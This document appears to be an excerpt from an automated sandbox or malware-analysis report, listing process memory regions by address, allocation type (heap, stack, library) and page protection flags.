|
||
1E0D99E0000
|
direct allocation
|
page read and write
|
||
23AC79EE000
|
heap
|
page read and write
|
||
1E0D65F0000
|
heap
|
page read and write
|
||
23AC6118000
|
heap
|
page read and write
|
||
1FC25494000
|
heap
|
page read and write
|
||
266F36AB000
|
heap
|
page read and write
|
||
281FC409000
|
heap
|
page read and write
|
||
2484A809000
|
heap
|
page read and write
|
||
23AC6129000
|
heap
|
page read and write
|
||
83C6DFF000
|
unkown
|
page read and write
|
||
1AB5E297000
|
heap
|
page read and write
|
||
1FC2555E000
|
heap
|
page read and write
|
||
1407C040000
|
trusted library allocation
|
page read and write
|
||
1FC22D24000
|
heap
|
page read and write
|
||
1C550057000
|
heap
|
page read and write
|
||
281FE184000
|
heap
|
page read and write
|
||
1C5500B5000
|
heap
|
page read and write
|
||
2484A154000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
266F3083000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
270D2020000
|
heap
|
page read and write
|
||
8BBBAFF000
|
stack
|
page read and write
|
||
19BC6521000
|
heap
|
page read and write
|
||
7FFAA9534000
|
trusted library allocation
|
page read and write
|
||
1DCE30E2000
|
heap
|
page read and write
|
||
1AB5E279000
|
heap
|
page read and write
|
||
24BA3988000
|
heap
|
page read and write
|
||
1BCD0DA0000
|
heap
|
page read and write
|
||
266F4F51000
|
heap
|
page read and write
|
||
1FC24EE2000
|
heap
|
page read and write
|
||
17FCF062000
|
heap
|
page read and write
|
||
1E0D9900000
|
direct allocation
|
page read and write
|
||
76BB4FE000
|
stack
|
page read and write
|
||
1407C750000
|
trusted library allocation
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
1C550777000
|
heap
|
page read and write
|
||
1407B1D0000
|
trusted library allocation
|
page read and write
|
||
267C16F0000
|
heap
|
page execute and read and write
|
||
1FC25612000
|
heap
|
page read and write
|
||
26A1C7C0000
|
heap
|
page read and write
|
||
1E0E161F000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1CEF2594000
|
heap
|
page read and write
|
||
1FC25359000
|
heap
|
page read and write
|
||
1A2CE3C7000
|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1909D570000
|
heap
|
page read and write
|
||
1FC25621000
|
heap
|
page read and write
|
||
270D2180000
|
heap
|
page read and write
|
||
23AC6135000
|
heap
|
page read and write
|
||
1E0E1596000
|
heap
|
page read and write
|
||
1C550770000
|
heap
|
page read and write
|
||
2CFD3AF000
|
stack
|
page read and write
|
||
1FC24F4C000
|
heap
|
page read and write
|
||
26A1C4A0000
|
heap
|
page read and write
|
||
135F0490000
|
heap
|
page read and write
|
||
A42D1EC000
|
stack
|
page read and write
|
||
7FFB1E47C000
|
unkown
|
page read and write
|
||
2DE1CB20000
|
heap
|
page read and write
|
||
239FECB0000
|
heap
|
page read and write
|
||
7FFB0B805000
|
unkown
|
page execute and write copy
|
||
1FC2535B000
|
heap
|
page read and write
|
||
1FC256B8000
|
heap
|
page read and write
|
||
1FC25402000
|
heap
|
page read and write
|
||
2322B41D000
|
heap
|
page read and write
|
||
C6030FF000
|
stack
|
page read and write
|
||
2322B41B000
|
heap
|
page read and write
|
||
1DD0EADC000
|
heap
|
page read and write
|
||
1FC24ECD000
|
heap
|
page read and write
|
||
1E0E2F94000
|
heap
|
page read and write
|
||
7FFAA9570000
|
trusted library allocation
|
page execute and read and write
|
||
23AC5B5C000
|
heap
|
page read and write
|
||
1FC22D1B000
|
heap
|
page read and write
|
||
2BA38B18000
|
heap
|
page read and write
|
||
1CEF25B9000
|
heap
|
page read and write
|
||
29AC2484000
|
heap
|
page read and write
|
||
239E4810000
|
heap
|
page read and write
|
||
1E8E34FB000
|
trusted library allocation
|
page read and write
|
||
1E8E41DD000
|
heap
|
page read and write
|
||
26379D80000
|
heap
|
page read and write
|
||
1DD0E9AB000
|
heap
|
page read and write
|
||
7FFB0B810000
|
unkown
|
page readonly
|
||
25D4E154000
|
heap
|
page read and write
|
||
76BB5FD000
|
stack
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
266F3066000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
15763FE000
|
unkown
|
page readonly
|
||
A42D4FF000
|
unkown
|
page read and write
|
||
92C15EF000
|
stack
|
page read and write
|
||
1FC25686000
|
heap
|
page read and write
|
||
281FC3EC000
|
heap
|
page read and write
|
||
82521BF000
|
stack
|
page read and write
|
||
281FC333000
|
heap
|
page read and write
|
||
27E84C80000
|
heap
|
page read and write
|
||
239E48F2000
|
heap
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
1E0E162B000
|
heap
|
page read and write
|
||
28425C60000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
28425E36000
|
heap
|
page read and write
|
||
7FF6DC72B000
|
unkown
|
page readonly
|
||
1407BD01000
|
trusted library allocation
|
page read and write
|
||
23195FC9000
|
heap
|
page read and write
|
||
281FC315000
|
heap
|
page read and write
|
||
26379E71000
|
heap
|
page read and write
|
||
51C2CFF000
|
unkown
|
page read and write
|
||
28425E10000
|
heap
|
page read and write
|
||
1EA23120000
|
heap
|
page read and write
|
||
2484C18E000
|
heap
|
page read and write
|
||
1E0D64B7000
|
heap
|
page read and write
|
||
7FFB0C5B3000
|
unkown
|
page execute and read and write
|
||
1DEE7CBB000
|
heap
|
page read and write
|
||
1CEF20A7000
|
heap
|
page read and write
|
||
281FC331000
|
heap
|
page read and write
|
||
1FC24E7D000
|
heap
|
page read and write
|
||
1C55076E000
|
heap
|
page read and write
|
||
1E0D64B9000
|
heap
|
page read and write
|
||
1FC26135000
|
heap
|
page read and write
|
||
7FFB0C5C1000
|
unkown
|
page execute and read and write
|
||
1E8E3FF4000
|
heap
|
page read and write
|
||
1CE58900000
|
heap
|
page read and write
|
||
1C550030000
|
heap
|
page read and write
|
||
2C25EE10000
|
heap
|
page read and write
|
||
1FC2568B000
|
heap
|
page read and write
|
||
266F3077000
|
heap
|
page read and write
|
||
1E0D9B21000
|
direct allocation
|
page read and write
|
||
7FF6DC72B000
|
unkown
|
page readonly
|
||
1E0E15AF000
|
heap
|
page read and write
|
||
7FFAA9720000
|
trusted library allocation
|
page read and write
|
||
1E0D67D0000
|
heap
|
page read and write
|
||
1FC256CA000
|
heap
|
page read and write
|
||
1FC2537B000
|
heap
|
page read and write
|
||
1FC2569C000
|
heap
|
page read and write
|
||
13C87890000
|
heap
|
page read and write
|
||
7FFB0BFE6000
|
unkown
|
page execute and write copy
|
||
1FC252DB000
|
heap
|
page read and write
|
||
281FE17E000
|
heap
|
page read and write
|
||
267A7752000
|
heap
|
page read and write
|
||
202E5974000
|
heap
|
page read and write
|
||
1C5500B8000
|
heap
|
page read and write
|
||
1E0E1626000
|
heap
|
page read and write
|
||
270D220F000
|
heap
|
page read and write
|
||
1E8E34F9000
|
trusted library allocation
|
page read and write
|
||
23AC5C4E000
|
heap
|
page read and write
|
||
1E8E41D0000
|
heap
|
page read and write
|
||
1C550799000
|
heap
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
1E8E3FF4000
|
heap
|
page read and write
|
||
1FC22D89000
|
heap
|
page read and write
|
||
20D43AF7000
|
heap
|
page read and write
|
||
21B1BD00000
|
heap
|
page read and write
|
||
1FC24EA8000
|
heap
|
page read and write
|
||
135F05E7000
|
heap
|
page read and write
|
||
7FFAA935D000
|
trusted library allocation
|
page execute and read and write
|
||
1CEF25A9000
|
heap
|
page read and write
|
||
17FCF04B000
|
heap
|
page read and write
|
||
1DD0FA5C000
|
heap
|
page read and write
|
||
267AA761000
|
trusted library allocation
|
page read and write
|
||
1E8E3FD0000
|
heap
|
page read and write
|
||
23DC4040000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1FC252A2000
|
heap
|
page read and write
|
||
1E4CFA0F000
|
heap
|
page read and write
|
||
51D457F000
|
stack
|
page read and write
|
||
1DD0C719000
|
heap
|
page read and write
|
||
2484A152000
|
heap
|
page read and write
|
||
266F3094000
|
heap
|
page read and write
|
||
7FFB0B807000
|
unkown
|
page read and write
|
||
1FC25870000
|
direct allocation
|
page read and write
|
||
1C5507A5000
|
heap
|
page read and write
|
||
83C6CFB000
|
stack
|
page read and write
|
||
27E84FF4000
|
heap
|
page read and write
|
||
1E0D9BA0000
|
direct allocation
|
page read and write
|
||
266F36E9000
|
heap
|
page read and write
|
||
7FFB0C5B7000
|
unkown
|
page read and write
|
||
2484A48E000
|
heap
|
page read and write
|
||
239E7395000
|
trusted library allocation
|
page read and write
|
||
1DD0C760000
|
heap
|
page read and write
|
||
14000000000
|
trusted library allocation
|
page read and write
|
||
28425DD0000
|
heap
|
page read and write
|
||
244EE070000
|
heap
|
page read and write
|
||
2484A172000
|
heap
|
page read and write
|
||
270D226A000
|
heap
|
page read and write
|
||
266F3091000
|
heap
|
page read and write
|
||
239E7D72000
|
trusted library allocation
|
page read and write
|
||
23AC5C4D000
|
heap
|
page read and write
|
||
26395B97000
|
heap
|
page read and write
|
||
266F4F54000
|
heap
|
page read and write
|
||
1E0E1730000
|
heap
|
page read and write
|
||
165335FA000
|
heap
|
page read and write
|
||
1909D370000
|
heap
|
page read and write
|
||
E0907FF000
|
stack
|
page read and write
|
||
1690F72C000
|
heap
|
page read and write
|
||
1FC25631000
|
heap
|
page read and write
|
||
2484C181000
|
heap
|
page read and write
|
||
1AB5E258000
|
heap
|
page read and write
|
||
1FC24F05000
|
heap
|
page read and write
|
||
1FC25F7F000
|
heap
|
page read and write
|
||
29AC2357000
|
heap
|
page read and write
|
||
1CEF2094000
|
heap
|
page read and write
|
||
1DCE2F80000
|
heap
|
page read and write
|
||
7E7A7FE000
|
stack
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
1407C861000
|
heap
|
page read and write
|
||
2BA9E6C0000
|
heap
|
page read and write
|
||
202E5610000
|
heap
|
page read and write
|
||
239E48DA000
|
heap
|
page read and write
|
||
7FFB0BFAC000
|
unkown
|
page execute and read and write
|
||
21B1BC20000
|
heap
|
page read and write
|
||
776F8FC000
|
stack
|
page read and write
|
||
1FC25368000
|
heap
|
page read and write
|
||
1407C790000
|
trusted library allocation
|
page read and write
|
||
1CEF20BE000
|
heap
|
page read and write
|
||
1E0E30A4000
|
heap
|
page read and write
|
||
2322B5E0000
|
heap
|
page read and write
|
||
1CEF25B0000
|
heap
|
page read and write
|
||
1FC25616000
|
heap
|
page read and write
|
||
1CEF3F7E000
|
heap
|
page read and write
|
||
266F36A7000
|
heap
|
page read and write
|
||
9A864FF000
|
stack
|
page read and write
|
||
1CEF2085000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1B3A8330000
|
heap
|
page read and write
|
||
7FFB1C3C1000
|
unkown
|
page readonly
|
||
1B3A8250000
|
heap
|
page read and write
|
||
1CEF2097000
|
heap
|
page read and write
|
||
1E0E161F000
|
heap
|
page read and write
|
||
1407BB1A000
|
heap
|
page read and write
|
||
1DCE30F2000
|
heap
|
page read and write
|
||
267A7840000
|
trusted library allocation
|
page read and write
|
||
1BCD0E4D000
|
heap
|
page read and write
|
||
157707E000
|
stack
|
page read and write
|
||
1E8E41C6000
|
heap
|
page read and write
|
||
7FFB0C43B000
|
unkown
|
page execute and write copy
|
||
17FCEFD0000
|
heap
|
page read and write
|
||
1FC25F7C000
|
heap
|
page read and write
|
||
7FFB1BB2A000
|
unkown
|
page execute and read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1DD0EAD9000
|
heap
|
page read and write
|
||
C063AFC000
|
stack
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
1C5500F1000
|
heap
|
page read and write
|
||
87BFDE8000
|
stack
|
page read and write
|
||
7FFB1BB11000
|
unkown
|
page execute and read and write
|
||
23AC5B66000
|
heap
|
page read and write
|
||
1FC2567E000
|
heap
|
page read and write
|
||
281FC3FB000
|
heap
|
page read and write
|
||
135F05F9000
|
heap
|
page read and write
|
||
EB4CAFC000
|
stack
|
page read and write
|
||
1FC25543000
|
heap
|
page read and write
|
||
1FC24F55000
|
heap
|
page read and write
|
||
1E7B6140000
|
heap
|
page read and write
|
||
266F36CF000
|
heap
|
page read and write
|
||
1E8E4043000
|
heap
|
page read and write
|
||
1C55079A000
|
heap
|
page read and write
|
||
281FC31F000
|
heap
|
page read and write
|
||
1690F750000
|
heap
|
page read and write
|
||
81D23AE000
|
stack
|
page read and write
|
||
1FC246E4000
|
heap
|
page read and write
|
||
20C72ED0000
|
heap
|
page read and write
|
||
2484A173000
|
heap
|
page read and write
|
||
15C99A20000
|
heap
|
page read and write
|
||
1FC25686000
|
heap
|
page read and write
|
||
270D2185000
|
heap
|
page read and write
|
||
1C5500AD000
|
heap
|
page read and write
|
||
15765FE000
|
unkown
|
page readonly
|
||
1CEF20A4000
|
heap
|
page read and write
|
||
E0906FE000
|
unkown
|
page read and write
|
||
C0388FF000
|
stack
|
page read and write
|
||
2BA9E6CB000
|
heap
|
page read and write
|
||
1C550778000
|
heap
|
page read and write
|
||
7FFAA9540000
|
trusted library allocation
|
page execute and read and write
|
||
26379E68000
|
heap
|
page read and write
|
||
23AC6100000
|
heap
|
page read and write
|
||
1E0D6610000
|
heap
|
page read and write
|
||
1CEF2684000
|
heap
|
page read and write
|
||
270D2233000
|
heap
|
page read and write
|
||
270D4054000
|
heap
|
page read and write
|
||
1FC25F88000
|
heap
|
page read and write
|
||
239E7E12000
|
trusted library allocation
|
page read and write
|
||
1FC25368000
|
heap
|
page read and write
|
||
7FFB0C440000
|
unkown
|
page readonly
|
||
266F36BF000
|
heap
|
page read and write
|
||
266F36E0000
|
heap
|
page read and write
|
||
8F1C4FE000
|
stack
|
page read and write
|
||
C6859FF000
|
stack
|
page read and write
|
||
1FC25607000
|
heap
|
page read and write
|
||
1C550111000
|
heap
|
page read and write
|
||
2484A7EC000
|
heap
|
page read and write
|
||
1FC255AF000
|
heap
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
24BA38C0000
|
heap
|
page read and write
|
||
267B93FF000
|
trusted library allocation
|
page read and write
|
||
7FFB0B899000
|
unkown
|
page execute and read and write
|
||
1DD0FA81000
|
heap
|
page read and write
|
||
1E0D644F000
|
heap
|
page read and write
|
||
1407B213000
|
heap
|
page read and write
|
||
1C28EFC000
|
stack
|
page read and write
|
||
1CEF2234000
|
heap
|
page read and write
|
||
266F30AD000
|
heap
|
page read and write
|
||
1FC24E8D000
|
heap
|
page read and write
|
||
1FC22D23000
|
heap
|
page read and write
|
||
20D43B01000
|
heap
|
page read and write
|
||
1C552011000
|
heap
|
page read and write
|
||
1BCD1064000
|
heap
|
page read and write
|
||
1DD0E244000
|
heap
|
page read and write
|
||
1FC25635000
|
heap
|
page read and write
|
||
1E8E37D0000
|
trusted library allocation
|
page read and write
|
||
20C72EC0000
|
heap
|
page read and write
|
||
2B526730000
|
heap
|
page read and write
|
||
1E8E4052000
|
heap
|
page read and write
|
||
1CEF3F7F000
|
heap
|
page read and write
|
||
266F36B8000
|
heap
|
page read and write
|
||
1E0D7EBB000
|
direct allocation
|
page read and write
|
||
22972EC2000
|
heap
|
page read and write
|
||
1FC25F7C000
|
heap
|
page read and write
|
||
1AD18A90000
|
heap
|
page read and write
|
||
1700B810000
|
heap
|
page read and write
|
||
23AC5B66000
|
heap
|
page read and write
|
||
270D245B000
|
heap
|
page read and write
|
||
20D43CA0000
|
heap
|
page read and write
|
||
1DEE7CAC000
|
heap
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
1CEF2040000
|
heap
|
page read and write
|
||
2BA9E650000
|
heap
|
page read and write
|
||
1DD0C6A0000
|
heap
|
page read and write
|
||
7FFAA9630000
|
trusted library allocation
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
270D218A000
|
heap
|
page read and write
|
||
1AB5E283000
|
heap
|
page read and write
|
||
1407B27B000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1E0E157B000
|
heap
|
page read and write
|
||
1E0D64E1000
|
heap
|
page read and write
|
||
E462FF000
|
unkown
|
page read and write
|
||
1690F726000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
266F36DC000
|
heap
|
page read and write
|
||
2484A137000
|
heap
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
267AA61E000
|
trusted library allocation
|
page read and write
|
||
20D43AB0000
|
heap
|
page read and write
|
||
270D27D5000
|
heap
|
page read and write
|
||
15C99A24000
|
heap
|
page read and write
|
||
1E0D643F000
|
heap
|
page read and write
|
||
28425D60000
|
heap
|
page read and write
|
||
267B9131000
|
trusted library allocation
|
page read and write
|
||
579B1FF000
|
stack
|
page read and write
|
||
1E0E30AE000
|
heap
|
page read and write
|
||
270D245E000
|
heap
|
page read and write
|
||
17FCF040000
|
heap
|
page read and write
|
||
1FC24E71000
|
heap
|
page read and write
|
||
1E0E2FAE000
|
heap
|
page read and write
|
||
1CEF25B7000
|
heap
|
page read and write
|
||
7FFB0C351000
|
unkown
|
page execute and read and write
|
||
1FC25556000
|
heap
|
page read and write
|
||
1FC24F4C000
|
heap
|
page read and write
|
||
9F33BFF000
|
unkown
|
page read and write
|
||
1E0E2FAA000
|
heap
|
page read and write
|
||
266F3204000
|
heap
|
page read and write
|
||
1FC25F7C000
|
heap
|
page read and write
|
||
2584DAE0000
|
heap
|
page read and write
|
||
23AC612A000
|
heap
|
page read and write
|
||
7FFB0B6F0000
|
unkown
|
page readonly
|
||
1AD18B31000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
81CDF7E000
|
stack
|
page read and write
|
||
E463FF000
|
stack
|
page read and write
|
||
17FCF062000
|
heap
|
page read and write
|
||
22972EB8000
|
heap
|
page read and write
|
||
270D2187000
|
heap
|
page read and write
|
||
24B86940000
|
heap
|
page read and write
|
||
19DD4EF0000
|
heap
|
page read and write
|
||
1AB5E2A3000
|
heap
|
page read and write
|
||
1E0E1629000
|
heap
|
page read and write
|
||
7FFAA9360000
|
trusted library allocation
|
page read and write
|
||
270D27BF000
|
heap
|
page read and write
|
||
26395BB0000
|
heap
|
page read and write
|
||
1FC24EF5000
|
heap
|
page read and write
|
||
1C5500B2000
|
heap
|
page read and write
|
||
19DD4E70000
|
heap
|
page read and write
|
||
1FC252E7000
|
heap
|
page read and write
|
||
23AC5B65000
|
heap
|
page read and write
|
||
1E4CFA12000
|
heap
|
page read and write
|
||
281FE170000
|
heap
|
page read and write
|
||
A2D7D7F000
|
stack
|
page read and write
|
||
1FC256BE000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
8F79A7E000
|
stack
|
page read and write
|
||
1CE586C0000
|
heap
|
page read and write
|
||
1DCE32C0000
|
heap
|
page read and write
|
||
1C550799000
|
heap
|
page read and write
|
||
281FC270000
|
trusted library allocation
|
page read and write
|
||
7FFAA950A000
|
trusted library allocation
|
page read and write
|
||
CB1DDFF000
|
stack
|
page read and write
|
||
93AF5FF000
|
unkown
|
page read and write
|
||
C0387FF000
|
unkown
|
page read and write
|
||
266F36CF000
|
heap
|
page read and write
|
||
1FC25523000
|
heap
|
page read and write
|
||
8F1C47F000
|
stack
|
page read and write
|
||
1DD0FAA1000
|
heap
|
page read and write
|
||
270D2222000
|
heap
|
page read and write
|
||
1E0D6457000
|
heap
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
7FFAA9560000
|
trusted library allocation
|
page read and write
|
||
1FC25D17000
|
heap
|
page read and write
|
||
1E4CFA12000
|
heap
|
page read and write
|
||
266F36DF000
|
heap
|
page read and write
|
||
1E8E4043000
|
heap
|
page read and write
|
||
281FC34E000
|
heap
|
page read and write
|
||
2584DBF4000
|
heap
|
page read and write
|
||
7FFB0D721000
|
unkown
|
page execute read
|
||
1E0E1622000
|
heap
|
page read and write
|
||
1C5500CB000
|
heap
|
page read and write
|
||
1FC25562000
|
heap
|
page read and write
|
||
1DD0E780000
|
heap
|
page read and write
|
||
1E181CF7000
|
heap
|
page read and write
|
||
1DD0EABC000
|
heap
|
page read and write
|
||
7FFB0C3C6000
|
unkown
|
page execute and read and write
|
||
239E6761000
|
trusted library allocation
|
page read and write
|
||
1FC24EE2000
|
heap
|
page read and write
|
||
236407C0000
|
heap
|
page read and write
|
||
1FC252A3000
|
heap
|
page read and write
|
||
1C55008B000
|
heap
|
page read and write
|
||
1EA24B90000
|
heap
|
page read and write
|
||
1FC255C1000
|
heap
|
page read and write
|
||
1FC25369000
|
heap
|
page read and write
|
||
270D2273000
|
heap
|
page read and write
|
||
1AB5E2A3000
|
heap
|
page read and write
|
||
1E4CF920000
|
heap
|
page read and write
|
||
26A1C7C4000
|
heap
|
page read and write
|
||
25D4E191000
|
heap
|
page read and write
|
||
23DC3E5D000
|
heap
|
page read and write
|
||
281FC51A000
|
heap
|
page read and write
|
||
23AC6132000
|
heap
|
page read and write
|
||
266F3150000
|
trusted library allocation
|
page read and write
|
||
20C72D9A000
|
heap
|
page read and write
|
||
270D2140000
|
trusted library allocation
|
page read and write
|
||
7E7A33B000
|
stack
|
page read and write
|
||
23AC5B07000
|
heap
|
page read and write
|
||
1CEF2594000
|
heap
|
page read and write
|
||
281FC333000
|
heap
|
page read and write
|
There are 3804 hidden memdumps, click here to show them.